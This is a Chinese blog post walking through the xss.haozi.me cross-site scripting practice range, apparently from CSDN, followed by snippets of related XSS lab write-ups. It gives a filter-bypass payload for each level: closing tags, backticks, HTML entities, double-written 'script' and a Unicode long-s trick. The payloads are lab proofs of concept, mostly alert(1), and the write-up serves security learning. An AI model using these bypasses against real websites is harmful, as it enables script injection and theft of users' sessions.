xss靶场haozi.me过关

已于 2024-07-03 19:32:12 修改
阅读量266 收藏 5
点赞数 3
文章标签: xss 前端
于 2024-07-03 19:12:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80063785/article/details/140130249
版权

靶场地址:http://xss.haozi.me

官方的js脚本地址:xss.haozi.me/j.js

https://www.segmentfault.com.haozi.me/j.js

0x00

没有任何过滤,直接使用script标签

<script>alert(1)</script>

0x01

闭合textarea标签

</textarea><script>alert(1)</script>

0x02

闭合input标签

"><script>alert(1)</script>

0x03

过滤了括号,使用反引号  ` 

<script>alert`1`</script>

0x04 

对 ` 也进行了过滤,使用编码绕过

<svg><script>alert&#40;1&#41;</script>

0x05

对输入的内容进行了注释,闭合注释

--!><script>alert(1)</script>

0x06

过滤了on后面的等号,选择换行绕过

onlick
=alert(1)

0x07

过滤了html标签,使用onerror绕过(onerror不依靠标签触发)

<img src=1 onerror='alert(1)'

0x08

</style>被替换,因为正则不能匹配空格,所以添加空格

</style ><script>alert(1)</script>

0x09

先输入固定网址,然后闭合<script>,进行报错绕过

https://www.segmentfault.com"></script><img src=1 onerror="alert(1)

0x0A

直接调用js脚本

https://www.segmentfault.com.haozi.me/j.js

0x0B

构造script标签使用js脚本

<script src=https://www.segmentfault.com.haozi.me/j.js></script>

0x0C

script被替换为空,选择双写绕过

<scscriptript src=https://www.segmentfault.com.haozi.me/j.js></scscriptript>

0x0D

先换行跳过注释,再把')用-->注释掉


alert(1)
-->

0x0E

普通字符标签被添加‘_’,使用特殊字符‘ ſ ’,ſ 与s相同

<ſcript src=https://www.segmentfault.com.haozi.me/j.js></script>

0x0F

由于编码在html标签中,所以被替换的编码会被还原再执行

');alert('1

0x10

没有过滤,直接alert(1)

alert(1)

0x11

"被替换为\",所以依旧可以使用,再使用分号隔开以及利用后面的")完成输出

");alert("1

0x12

没有过滤script标签,直接闭合

</script><script>alert(1)</script>

黎溧
关注
XSS线上靶场---Warmups
qq_52016943的博客
08-01 2394
XSS线上靶场
Xss.haozi在线练习靶场1-19关(带答案及靶场地址)
2301_78238055的博客
08-22 735
一个在线的XSS练习靶场19关全带通关答案
xss.haozi.me练习通关
lml_0916的博客
07-27 598
这里将auto或者on过滤成了_,并且是在input标签输出,所以这里可以将type的值改成imge的形式进行输出,并且使用换行的方式来停止以on开头=结尾变成_。这一关是将括号给过滤掉了,也就是说alert()的括号不可以直接打印出来,所以这里可以采用两种方式,一种是编码的形式,另一种就是使用反引号来代替括号。这一关限制了不可以对style标签进行闭合,一旦出现会转变为“坏人”,但是html中将标签换行也是可以识别的,所以可以换行处理标签。将src闭合,然后写弹窗,然后将后面注释。............
网络安全之XSS靶场
最新发布
huizhaohaha的博客
08-18 786
可以看到,我们通过url传递参数,传递了两个,一个src =1,一个onerror,最后保留下来了onerror参数,那这是什么原理呢,我们可以根据这个进行猜测,那就是,在这个循环删除完第一个参数的时候,指针网第二个参数走,但是由于,第一个参数没有数据了,我的传递的第二个参数向前走了一步,也就是到达了第一个参数的位置,而现在指针指的位置为空了,删不删的无所谓了,那么依据我们的分析,我们传递的参数可以保留偶数的参数,奇数参数都将会被删除,那么我们可以试一试看看我们的猜测是否正确。
xss.haozi.me靶场通关参考
爆金币了,老登!
06-19 884
全关卡记录,所有靶场的payload
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2224
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi练习通关详解
爱国小白帽
11-05 2557
题目连接:https://xss.haozi.me 0x00 原理解读: 这个游戏是要弹图片才算通关的,光弹窗不行,所以第一关就用最简单的img标签过 payload: <img src="任意图片名" onerror="alert(1)"> 0x01 原理解读: 从server code中可以看到输入的内容被插入到了<textarea>标签中,所以只要闭合这个标签就行了 payload: </textarea><img src="任意图片名" onerror=
XSS-haozi
个人博客
08-10 393
https://xss.haozi.me/ XSS学习 github项目地址:haozi/xss-demo: ????????‍♂️ xss 攻防靶场,issues 有答案 (github.com) 0x00 server code function render (input) { return '<div>' + input + '</div>' } payload <script>alert(1)</script> 未做处理 0x01 ser
xss靶场在线靶场
小白的博客
09-09 939
xss靶场在线靶场
XSS简单在线靶场
qq_51979295的博客
09-19 540
反射型xss在线靶场通关
XSS靶场
weixin_53860392的博客
03-08 835
1.
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
XSS线上靶场---haozi
qq_52016943的博客
07-29 1305
XSS 在线靶场
xss靶场xss.haozi
weixin_46954909的博客
06-01 684
这题显而易见的是括号不能使用了,我们的办法是替代法和进行编码,使用`来替代()或者使用编码的方式来替代掉括号,但要注意的是,script不能解析编码,所以script标签不能用编码的方式。这题没什么好说的,就是闭合+注释,搭配上script语句就可以了,虽然将&,’”<>/\都编码了,但是这就是典型的骗自己,因为即时编码了,但在img标签里也是能解析的,所以相当于徒劳。这题我们观察到直接输入,他是在input语句的属性值中,无法执行我们的js语句,所以我们的思路也是直接闭合掉语句,执行js语句。
XSS线上靶场---prompt
qq_52016943的博客
07-30 1117
XSS prompt
xss-labs靶场
风过江南乱的博客
02-18 386
前言 靶场项目地址:https://github.com/do0dl3/xss-labs 题目 level1 直接传入弹个窗就行了 level1.php?name=<script>alert('xss')</script> level2 需写闭合前面的<input name=keyword value=" level2.php?keyword="><script>alert('xss')</script> level3
XSS-labs靶场
Vi_vids的博客
03-10 444
xss-labs靶场 Less-01 对于XSS漏洞,在实战中未避免因关键字被发现,多采用h5标签进行试探。 可以判断存在xss注入; 或者使用另一种payload Less-02
XSS Game靶场练习
qq_64338246的博客
08-17 975
虽然这里又用了innerHTML,但是过滤了括号会导致无法触发函数,所以不能像第一关那样直接用img标签。这里用双引号闭合,让jeff=aaa正常执行(aaa可以换成别的),然后在后面继续执行弹出1337的命令。用location把编码的符号变成字符串,然后再用括号的替代品如%2528和%2529来进行绕过。实际操作时可以看到,网页在加载完成后,经过两秒会再加载一次,这里就是在进行submit的提交。这一关依旧是get传参,只是多了一个submit提交事件,配合定时器在两秒后自动提交。
APMServ搭建教程:利用xss.me构造跨站攻击
本教程是关于如何利用xss.me自动攻击工具进行跨站脚本(Cross-Site Scripting, XSS)攻击的搭建指南。它主要针对的是APMServ 5.2.6作为服务器环境,同时提到了一些关键步骤和注意事项。 首先,确保APMServ的安装路径...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值